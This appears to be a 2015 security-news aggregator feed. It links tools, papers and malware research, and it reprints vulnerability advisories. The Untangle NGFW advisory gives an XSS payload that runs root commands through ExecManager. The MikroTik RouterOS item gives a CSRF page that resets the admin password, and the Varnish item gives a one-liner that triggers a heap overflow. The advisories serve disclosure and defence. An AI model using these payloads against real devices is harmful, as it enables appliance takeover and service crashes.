Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

CERT C Secure Coding Standard Wiki

March 8, 2015, 7:27 am
$
0
0
The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.


more here...........https://www.securecoding.cert.org/confluence/display/c/CERT+C+Coding+Standard
Search

Python Registry Parser (regparse)

March 8, 2015, 10:00 am
$
0
0
I released a tool called, Python Registry Parser (or regparse for short), which is a plugin based Windows Registry parser written in Python.

The reason for writing regparse was three fold.
1) I don’t like the output that current registry parsers (Gui/non-Gui) provide.
2) I like RegRipper, but didn’t want to learn Perl.
3) I wanted to improve my Python skills.

more here.........https://sysforensics.org/2015/03/python-registry-parser.html

Android Malware Evaluating Tools

March 8, 2015, 11:39 am
$
0
0
In order to accomplish a deep antimalwares' detection algorithms analysis, we developed two different tools, both coded in Java.

more here........https://github.com/faber03/AndroidMalwareEvaluatingTools

Contemplating Malware Immunization via Infection Markers

March 8, 2015, 2:36 pm
$
0
0
Some malware avoids infecting the system twice by looking for predefined markers. For instance, if a particular process, registry key or mutex object is present on the host, such malicious software will assume that another instance of itself is already active and terminate before causing further harm. We could decrease the likelihood of infection by preemptively creating markers known to be associated with malware.

more here.........https://zeltser.com/malware-immunization-infection-markers/

Multiple vulnerabilities in Untangle NGFW 9-11

March 9, 2015, 1:46 am
$
0
0
Multiple issues have been discovered in the Untangle NGFW virtual
appliance. The vendor was unresponsive and uncooperative to the researcher.

- Persistent XSS leading to root
Authentication requiredConfirmed in versions 9 and 11 (up to rev r39357)
Throughout
 the Untangle user interface there are editable data tables for various
user configuration options. An example of this is in: Configuration >
 Networking > Port Forwards. This table can be edited by clicking add
 to create a new port forward rule, or directly edited by
double-clicking on the table rows themselves.
The
 problem arises from malicious user input into some of the fields of
these editable tables, which is not properly sanitised and allows for
execution of user supplied Javascript code in the context of the users
browser. Because this configuration data is saved into the backend
database, this allows for Persistent XSS in each of the vulnerable
fields/tables.
This XSS attack is particularly
devastating due to the fact that the malicious attacker can run commands
 as root on the virtual appliance, allowing for total system takeover.
This is because the Untangle JSON-RPC API has access to functionality
provided by the ExecManager class
(https://gitorious.org/untangle/src/source/381ad9cb2d1d475bb43814b07bbb0df2d1ae7b58:uvm/api/com/untangle/uvm/ExecManager.java),
 which by default allows for arbitrary commands to be run as root on the
 system.
A POC demonstrating the issue is below:
Insert
 the following into the srcdoc attribute of a user-controlled iframe in
the Description field or another vulnerable field (can also be styled to
 hide etc):
Test <iframe srcdoc='[insert code]'></iframe> (single quotes)
Insert:
<html><head>        <script type="text/javascript" src="/ext4/ext-all-debug.js"></script>        <script type="text/javascript" src="/jsonrpc/jsonrpc.js"></script>        <script type="text/javascript" src="/script/i18n.js"></script>        <script type="text/javascript" src="script/components.js"></script>        <script type="text/javascript" src="script/main.js"></script></head><body onload="exec()"><script type="text/javascript">        function exec() {                var rpc = {};                rpc.jsonrpc = new JSONRpcClient("/webui/JSON-RPC");                var serverUID = rpc.jsonrpc.UvmContext.getServerUID();                alert(serverUID);                rpc.execManager = rpc.jsonrpc.UvmContext.execManager();                var cmd = "whoami > /tmp/who";                var exit = rpc.execManager.execResult(cmd);                alert("Command: " + cmd + " - Exit code: " + exit);        }</script></body></html>
- Information disclosure from Local Directory
Authentication requiredConfirmed in versions 9 and 11, not fixed.
The
 Local Directory interface shows a list of users stored on the Untangle
system. Unfortunately, passwords are not sufficiently encrypted to
prevent information disclosure.
Each user in
the local directory interface has an attribute, 'passwordBase64Hash',
which is the base64 encoded string of the plaintext password. Because
base64 is a bi-directional encoding scheme, the passwordBase64Hash
attribute can be trivially decoded into the original plaintext string,
revealing the password for each user.

CH


Authored by 
Hutton 

How Malware Generates Mutex Names to Evade Detection

March 9, 2015, 1:50 am
$
0
0
Malicious software sometimes uses mutex objects to avoid infecting the system more than once, as well as to coordinate communications among its multiple components on the host. Incident responders can look for known mutex names to spot the presence of malware on the system. To evade detection, some malware avoids using a hardcoded name for its mutex, as is the case with the specimen discussed in this note.

more here..........https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429

OpenKM Platform Remote Reflected Cross Site Scripting (PoC)

March 9, 2015, 3:13 am
$
0
0
# Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting
# Google Dork: N/A
# Date: 18-11-2014
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.openkm.com/en
<http://s.bl-1.com/h/mPQYWnX?url=http://www.openkm.com/en>/
# Software Link: http://www.openkm.com/en/download-english.html
<http://s.bl-1.com/h/mPQZb9Z?url=http://www.openkm.com/en/download-english.html>
# Version: All versions < 6.4.19 (built 23338)
# Tested on: All OS
# CVE : N/A

Hi,

My Name is Mohamed Abdelbaset Elnoby aka ( @SymbianSyMoh ) an Information
Security Evangelist from Egypt.

I want to report a major security vulnerabilities in OpenKM Platform, Let's
know firstly what is OpenKM :: Open Knowledge Management

OpenKM is a Free/Libre document management system that provides a web
interface for managing arbitrary files. OpenKM includes a content
repository, Lucene indexing, and jBPM workflow. The OpenKM system was
developed using Java technology.
In 2005 two developers involved in open source technologies and expertise
with some commercial document management solutions (Sharepoint, Documentum,
Hummingbird, among others) like Excalibur search engine or Kofax OCR engine
decided to start an open source project based on high level technologies to
build a document management system that they decided to call OpenKM.
"-Wikipedia"

Ref: http://en.wikipedia.org/wiki/OpenKM
<http://s.bl-1.com/h/mPQZhbc?url=http://en.wikipedia.org/wiki/OpenKM>

-Vulnerability: Remote Reflected/Stored Cross Site Scripting with no remote
interaction
-Severity: Very Critical
-Vulnerable Parameter(s)/Input(s): Tasks
-Info: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
<http://s.bl-1.com/h/mPQZmzf?url=https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29>
-Impact: Remote Admin or Users Full Account Takeover with no interaction.

-Attack Scenario:
1. User#1 "Attacker" : Creates a task with a vulnerable name and assign it
to another User/Admin "Targeted Victim".
2. User#2 "Victim" : Got Exploited with the vulnerable Task made by the
Attacker "User#1" since the Task notification will automatically appears to
the assigned user side "Victim" also the notification popup displays the
vulnerable task name and the victim will be exploited with no interactions.


-PS: This is the most critical attack you will see on OpenKM platform
because it will work remotely against users even with the same scenario
described in the report you can steal/execute a JS in the Administrator's
session.
-PoC Video: http://youtu.be/3jBQFAAq23k

Thanks

--
*Best Regards**,**,*


*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<http://s.bl-1.com/h/mPQZqNh?url=https://www.linkedin.com/in/symbiansymoh>Curriculum
Vitae <http://s.bl-1.com/h/mPQZwnk?url=http://goo.gl/cNrVpL>
<http://s.bl-1.com/h/mPQZ09m?url=https://www.linkedin.com/in/symbiansymoh>
Facebook
<http://s.bl-1.com/h/mPQZ4Zo?url=https://fb.com/symbiansymoh>Twitter
<http://s.bl-1.com/h/mPQZ9yq?url=https://twitter.com/symbiansymoh>

BERserk

March 9, 2015, 1:56 am
$
0
0
A Go implementation of the BERserk attack against Mozilla NSS ASN.1 parsing of PKCS#1 RSA signatures with e = 3. Complete of a certificate generation tool, works with CAs in the trust store.

more here........https://github.com/FiloSottile/BERserk
Search

Chrome SOP Bypass with SVG (CVE-2014-3160)

March 9, 2015, 2:06 am
$
0
0
This is a short writeup about my SOP (Same-Origin Policy) bypass with SVG images I've found in Chrome, so that other security researchers can benefit from it. I reported the Chrome vulnerability to Google's security team in 2014 and they did a very good job at fixing it in Chrome's M36 release. At around Q4 2014 the bug ticket (#380885) was opened to public, so that I'm allowed to publish this writeup (as soon as I find time to write)...

more here...........http://www.christian-schneider.net/ChromeSopBypassWithSvg.html

First version of working CanBusHacker - low budget Can Bus sniffer/injector work in progress

March 9, 2015, 2:06 am
$
0
0
This is a project to make a real time CAN packet monitoring system using Arduino and CAN BUS shield hardware. This makes a very affordable and reliable CAN packet monitor and injector.


more here.......https://github.com/ohjeongwook/CanBusHacker

A Ghost Tale

March 9, 2015, 2:08 am
$
0
0
Back in January, me and other two guys, tested Ghost CMS doing a Web Application PT and a code review.
I won't talk here of the whole test, but I'll focus on my findings trying to explain what brings me to discover them.

more here...........https://bughardy.me/a-ghost-tale/

Exploits

March 9, 2015, 2:11 am
$
0
0
Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes here.....https://github.com/XiphosResearch/exploits

MikroTik RouterOS Admin Password Change CSRF (PoC)

March 9, 2015, 3:13 am
$
0
0
# Exploit Title: MikroTik RouterOS Admin Password Change CSRF
# Google Dork: N/A
# Date: 23-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.mikrotik.com
<http://s.bl-1.com/h/mPRbq77?url=http://www.mikrotik.com/>/
# Software Link: http://www.mikrotik.com/download
<http://s.bl-1.com/h/mPRbvX9?url=http://www.mikrotik.com/download>
# Version: All versions < 5.0
# Tested on: All OS
# CVE : N/A

What is MikroTik RouterOS?!
MikroTik RouterOS is an operating system based on the Linux kernel, known
as the MikroTik RouterOS. Installed on the company's proprietary hardware
(RouterBOARD series), or on standard x86-based computers, it turns a
computer into a network router and implements various additional features,
such as firewalling, virtual private network (VPN) service and client,
bandwidth shaping and quality of service, wireless access point functions
and other commonly used features when interconnecting networks. The system
is also able to serve as a captive-portal-based hotspot system.
__"Wikipedia"


What is CSRF Attack?!
Cross-Site Request Forgery (CSRF) is an attack which forces an end user to
execute unwanted actions on a web application in which he/she is currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request. With a little help of social engineering (like sending a
link via email/chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state
changing requests like transfering funds, changing their email address,
etc. If the victim is an administrative account, CSRF can compromise the
entire web application.
__"OWASP"


Affected Versions:
All MikroTik RouterOS versions before v5.0


PoC Code:
<html>
<body>
<title>MikroTik RouterOS < v4 Admin Password Change CSRF
Vulnerability</title>
<h1><b>MikroTik RouterOS < v4 Admin Password Change CSRF Vulnerability by
@SymbianSyMoh</b></h1></br>
<input type="submit" value="Do it" onclick="var
btn=document.createElement('IFRAME');btn.src='
http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned')
;"></br>
</body>
</html>


Video PoC:
http://youtu.be/FHrvHJeLjLA

--
*Best Regards**,**,*


*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<http://s.bl-1.com/h/mPRb0wC?url=https://www.linkedin.com/in/symbiansymoh>Curriculum
Vitae <http://s.bl-1.com/h/mPRb4KF?url=http://goo.gl/cNrVpL>
<http://s.bl-1.com/h/mPRb9kH?url=https://www.linkedin.com/in/symbiansymoh>
Facebook
<http://s.bl-1.com/h/mPRbF6K?url=https://fb.com/symbiansymoh>Twitter
<http://s.bl-1.com/h/mPRbKWM?url=https://twitter.com/symbiansymoh>

_______________________________________________

Varnish 4.0.3 heap-buffer-overflow while parsing backend server HTTP response

March 9, 2015, 3:22 am
$
0
0
Varnish Cache is a web application accelerator also known as a caching HTTP reverse proxy. You install it in front of any server that speaks HTTP and configure it to cache the contents. Varnish Cache is really, really fast. It typically speeds up delivery with a factor of 300 - 1000x, depending on your architecture. (Source Page: https://www.varnish-cache.org/about)

Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seem to have a problem with parsing HTTP responses from
backend.
The following example response will trigger a heap buffer overflow :

-- cut --
perl -e 'print "HTTP/1.1 200 OK\r\nContent-Length: dupa" . "\n" x 15855 . "A" x 10000 . "\n" ' | nc -l 1098
-- cut --

assuming your config uses localhost:1098 as backend.


meh kernel: [2045151.042468] traps: varnishd[25794] general protection ip:42982c sp:7eff082db2d0 error:0 in
varnishd[400000+ac000]

Original asan report :
--- cut ---
=================================================================
==12962==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900cb24200 at pc 0x7feffed5a87b bp 0x7fef7b213fa0
sp 0x7fef7b213760
WRITE of size 32029 at 0x62900cb24200 thread T596
    #0 0x7feffed5a87a (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e87a)
    #1 0x7feffff11849 in HTTP1_Read (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xe8849)
    #2 0x7feffff04727 in v1f_pull_straight (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xdb727)
    #3 0x7fefffee1a35 in vfp_call (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8a35)
    #4 0x7fefffee210f in VFP_Suck (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb910f)
    #5 0x7fefffee2ee3 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9ee3)
    #6 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
    #7 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
    #8 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
    #9 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
    #10 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
    #11 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #12 0x7feffd9fa00c in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xfb00c)

0x62900cb24200 is located 0 bytes to the right of 16384-byte region [0x62900cb20200,0x62900cb24200)
allocated by thread T596 here:
    #0 0x7feffed807df in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x547df)
    #1 0x7feffffbe5e1 in sma_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1955e1)
    #2 0x7feffffb04c9 in stv_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1874c9)
    #3 0x7feffffb0e7b in stv_alloc_obj (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x187e7b)
    #4 0x7feffffb39ee in STV_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x18a9ee)
    #5 0x7fefffee1696 in VFP_GetStorage (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8696)
    #6 0x7fefffee2953 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9953)
    #7 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
    #8 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
    #9 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
    #10 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
    #11 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
    #12 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T596 created by T16 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2d18d in pool_breed (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10418d)
    #2 0x7feffff2dd3f in pool_herder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x104d3f)
    #3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T16 created by T6 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2f043 in pool_mkpool (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106043)
    #2 0x7feffff2f527 in pool_poolherder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106527)
    #3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T6 created by T0 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2f8e1 in Pool_Init (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1068e1)
    #2 0x7feffff1a4cb in child_main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xf14cb)
    #3 0x7feffff91402 in mgt_launch_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x168402)
    #4 0x7feffff92e06 in mgt_reap_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x169e06)
    #5 0x7feffff90541 in child_listener (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x167541)
    #6 0x7feffeb09ce7 in vev_schedule_one (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x24ce7)
    #7 0x7feffeb084b8 in vev_schedule (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x234b8)
    #8 0x7feffff93ff6 in MGT_Run (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x16aff6)
    #9 0x7feffff9db1f in main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x174b1f)
    #10 0x7feffd920ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c528195c7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c528195c840:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

--- cut ---

Our understanding after previous reports is that varnish security model assumes full
trust of the backend, so this is not considered a security problem (but we do).

Authored by
Filip Palian
Akat1
Marek Kroemeke

Exploiting the Cloud and Mitigating the Risk of SaaS Supplier Failure

March 9, 2015, 6:10 am
$
0
0
The cloud is here to stay and according to a recent survey [i], organisations are going to be investing more in cloud services to support their core business operations.

But have companies properly considered the risks of SaaS supplier failure if the software is supporting their core processes?

The Kemp Little Consulting (KLC) team has been working with NCC Group to identify some of the risks of SaaS supplier failure and to identify the main problems that end user organisations would need to solve to effectively mitigate these risks.

more here......https://www.nccgroup.com/en/blog/2015/03/exploiting-the-cloud-and-mitigating-the-risk-of-saas-supplier-failure/
Search

Paper: Tighter, faster, simpler side-channel security evaluations beyond computing power

March 9, 2015, 6:13 am
$
0
0
Abstract. A Eurocrypt 2013 paper “Security evaluations beyond computing
power: How to analyze side-channel attacks you cannot mount?”
by Veyrat-Charvillon, G´erard, and Standaert proposed a “Rank Estimation
Algorithm” (REA) to estimate the difficulty of finding a secret
key given side-channel information from independent subkeys, such as
the 16 key bytes in AES-128 or the 32 key bytes in AES-256. The lower
and upper bounds produced by the algorithm are far apart for most key
ranks. The algorithm can produce tighter bounds but then becomes exponentially
slower; it also becomes exponentially slower as the number
of subkeys increases.
This paper introduces two better algorithms for the same problem. The
first, the “Extended Rank Estimation Algorithm” (EREA), is an extension
of REA using statistical sampling as a second step to increase the
speed of tightening the bounds on the rank. The second, the “Polynomial
Rank Outlining Algorithm” (PRO), is a new approach to computing the
rank. PRO can handle a much larger number of subkeys efficiently, is
easy to implement in a computer-algebra system such as Sage, and produces
much tighter bounds than REA in less time

more here........http://sidechannels.cr.yp.to/pro/pro-20150308.pdf

Hacking Team Reloaded? US-Based Ethiopian Journalists Again Targeted with Spyware

March 9, 2015, 6:14 am
$
0
0
Summary

On February 12, 2014, Citizen Lab published a report1 documenting how journalists at the Ethiopian Satellite Television Service (ESAT) were targeted by a governmental attacker in December 2013, with what appeared to be Hacking Team’s Remote Control System (RCS) spyware.
This report details the events of November 5 and 10 and December 19, 2014, when the same attacker again targeted ESAT journalists based in the United States with what appear to be two updated versions of Hacking Team’s RCS spyware.
We link the governmental attacker to Ethiopia. The attacker may be the Ethiopian Information Network Security Agency (INSA).2
Hacking Team has a customer policy concerning the human rights implications of its products,3 and claims it investigates and may take action in response to reported cases of abuse.4 The research findings documented in this report suggest that Hacking Team may have continued to provide updated versions of its spyware to the same attacker, despite reports of use of the spyware against journalists.

more here.........https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

iOS Tutorial – Dumping the Application Memory Part 2

March 9, 2015, 6:53 am
$
0
0
In my previous blog, iOS Tutorial – Dumping the Application Heap from Memory, I covered how to dump sensitive information from the heap of an iOS application using GDB. This time we will be covering how to use Cycript to accomplish the same goal but using the class-dump-z output to specifically pull out properties or instance variables. This round will be in a more automated fashion by automatically parsing a class dump of the binary and generating the necessary Cycript scripts to pull the specific properties from memory. I will also be releasing another tool to do all of this for you in the near future. Keep an eye on our NetSPI GitHub repo for the latest tools and scripts for when we release it.

more here...........https://blog.netspi.com/ios-tutorial-dumping-the-application-memory-part-2/

0 Detection PDF with external link to malware EXE

March 9, 2015, 8:55 am
$
0
0
This morning Malware Domain List tweeted a 0/57 detection malware PDF which was/is not detected as malware by any AV product on VirusTotal.com

more here.........http://blog.malwaretracker.com/2015/03/0-detection-pdf-with-external-link-to.html

Paper: Enpublic Apps: Security Threats Using iOS Enterprise and Developer Certificates

March 9, 2015, 10:17 am
$
0
0
ABSTRACT
Compared with Android, the conventional wisdom is that
iOS is more secure. However, both jailbroken and nonjailbroken
iOS devices have number of vulnerabilities. For
iOS, apps need to interact with the underlying system using
Application Programming Interfaces (APIs). Some of these
APIs remain undocumented and Apple forbids apps in App
Store from using them. These APIs, also known as “private
APIs”, provide powerful features to developers and yet they
may have serious security consequences if misused. Furthermore,
apps which use private APIs can bypass the App Store
and use the “Apple’s Enterprise/Developer Certificates” for
distribution. This poses a significant threat to the iOS ecosystem.
So far, there is no formal study to understand
these apps and how private APIs are being encapsulated.
We call these iOS apps which distribute to the public using
enterprise certificates as “enpublic” apps. In this paper, we
present the design and implementation of iAnalytics, which
can automatically analyze “enpublic” apps’ private API usages
and vulnerabilities. Using iAnalytics, we crawled and
analyzed 1,408 enpublic iOS apps. We discovered that: 844
(60%) out of the 1408 apps do use private APIs, 14 (1%) apps
contain URL scheme vulnerabilities, 901 (64%) enpublic
apps transport sensitive information through unencrypted
channel or store the information in plaintext on the phone.
In addition, we summarized 25 private APIs which are crucial
and security sensitive on iOS 6/7/8, and we have filed
one CVE (Common Vulnerabilities and Exposures) for iOS
devices.

more here..........http://www.cs.cuhk.hk/~cslui/PUBLICATION/ASIACCS15.pdf
Viewing all 8064 articles
Browse latest View live
Search